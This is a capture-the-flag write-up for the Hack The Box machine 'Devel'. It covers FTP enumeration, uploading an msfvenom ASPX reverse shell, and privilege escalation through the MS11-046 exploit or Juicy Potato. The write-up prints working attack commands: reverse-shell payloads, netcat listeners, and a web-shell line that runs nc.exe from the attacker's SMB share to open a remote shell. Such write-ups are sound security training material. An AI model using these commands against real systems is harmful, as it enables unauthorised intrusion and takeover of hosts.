HTB - Devel

Windows | FTP | Web Shell | Watson | SeImpersonatePrivilege

Tools For This Room

TL;DR / Executive Summary

  1. Scan and enumerate with nmap

  2. Gain foothold by uploading files via FTP for reverse shell

  3. Privesc by exploiting OS version or abusing process tokens

Scanning & Enumeration

We'll start with the usual scans of nmap and gobuster

  • Nmap 

nmap -sV -sC -vv <IP>

We see the following ports are open: 21: FTP 80: HTTP

  • Gobuster

gobuster dir -u http://<IP> -w <wordlist>

We can try it with a few wordlists, such as dirb's common.txt or directory-list-2.3-medium.txt. Unfortunately, neither list provides any interesting results.

Let's check out what is at port 80. We get this image when visiting the page:

Clicking on the image directs us to this page:

Let's check out port 21. Since our nmap scan showed that anonymous login is allowed, we should see where that leads.

ftp <IP>

We provide the following credentials when prompted: Name: anonymous Password: <enter>

Once we're in, we should set the file transfer mode to binary, which must be used when transfering non-ASCII files. This can be done by simply entering "binary" in FTP. Now let's explore and try to find anything which may provide a foothold.

We can check out what welcome.png is by using:

GET welcome.png

Alas, this is simply the "IIS7 Internet Information Services" image which we saw earlier on port80.

However, if we are able to download files via FTP, we may able to upload files too. We could then upload a malicious file to get a reverse shell.

Gaining Foothold

Before we setup our malicious file, let's test our theory first. We can do this by uploading a simple test.txt file, and browsing to our test file to see if it works.

echo 'testing123' > test.txt

On our FTP connection:

PUT test.txt

Browsing to our file to see if it works:

Nice! Now that we've confirmed this works, let's get our reverse shell.

We'll start by creating a reverse shell using msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<port> -f aspx -o devel.aspx

Uploading it via FTP

PUT devel.aspx

Setting up a netcat listener to catch the reverse shell

netcat -lvnp <port>

Browse to our file on our preferred browser, and check our netcat listener:

* Aside from the method above, there are other ways to get a reverse shell. We won't go into too much detail, but the gist of those paths will be listed below as alternatives. * Alternative 1: Metasploit - create a reverse shell with msfvenom msfvenom -p windows/meterpreter_reverse_tcp LHOST=<IP> LPORT=<port> -f aspx > reverse.aspx - upload reverse.aspx via FTP - start metasploit listener, set payload as windows/meterpreter_reverse_tcp - execute and get reverse shell Alternative 2: Web Shell -> Reverse Shell - download our web shell here, or copy it from /usr/share/seclists/Web-Shells/FuzzDB/cmd.aspx to our desired directory - upload cmd.aspx via FTP - browse to <IP>/cmd.aspx - start an SMB server to host the Windows binary to netcat - start a netcat listener - run the following command on our web shell: \\<ourIP>\share\nc.exe -e cmd.exe <ourIP> <ncPort> * Web Shell -> Reverse Shell Walkthrough

Privilege Escalation

There are a number of ways to privesc on this machine. We will explore 2 of these methods in detail below.

Method 1

We can start off by gathering information on the system such as its OS name, version, etc. This can be done with a simple command:

systeminfo

We see the results here:

Let's start with the OS Version, and see if there are any exploits for that. A Google search provides us with a result from exploit-db.com, which we can download. Alternatively, we can always find this exploit on our machine, and copy it to our desired directory with this:

searchsploit 40564
searchsploit -m windows_x86/local/40564.c

However, we discover that the exploit is in C. Fortunately, the author has provided handy-dandy compiling instructions:

i686-w64-mingw32-gcc MS11-046.c -o MS11-046.exe -lws2_32

We can now upload this to the victim machine via FTP:

PUT MS11-046.exe

Navigating to the directory with our MS11-046.exe:

cd c:\inetpub\wwwroot

Upon executing the file, we find that we are now root!

Navigating to the Administrator's Desktop to grab the flag:

* Another way to enumerate the potential privesc vulnerabilities is through Watson. Watson can be downloaded here. However, since this machine is using x86 architecture, we need to dig through the commits to find the first version of it, as the latest version is meant for x64 architecture.*

Method 2

One of the easy "low-hanging fruit" privesc checks we can try is if we are able to abuse process tokens. More details of this can be found here. We can do this with the command:

whoami /priv

The results are shown below. We'll focus on SeImpersonatePrivilege and if its enabled.

We're in luck! We can now run an exploit known as Juicy Potato to privesc.

As mentioned above, we need to compile the .sln file using Visual Studio on a Windows/macOS machine into an .exe file.

Aside from the JuicyPotato file, we will also need to create a .bat reverse shell using msfvenom:

msfvenom -p cmd/windows/reverse_powershell LHOST=<IP> LPORT=<port> > shell.bat

After transferring the .exe file to our attacking machine, we upload both the .exe and .bat files via FTP:

PUT JuicyPotatox86.exe 
PUT shell.bat

We then get a netcat listener going to catch our reverse shell:

netcat -lvnp <port>

Now to navigate to the directory with our JuicyPotatox86.exe file. This can be done with:

cd c:\inetpub\wwwroot

Before we can execute the file, there are a few arguments to input:

Aside from the mandatory arguments (-t, -p, -l), we also need to input which CLSID to use. Unfortunately, this will require a bit of trial-and-error with the BITS, which can be found here.

In our case, we'll use the following BITS:

JuicyPotatox86.exe -t * -p shell.bat -l <port> -c {03ca98d6-ff5d-49b8-abc6-03dd84127020}

Once we receive the reverse shell on our listener, we'll find that we are root!

PreviousJust the tip with pentestingNextHTB - Chatterbox

Last updated

Was this helpful?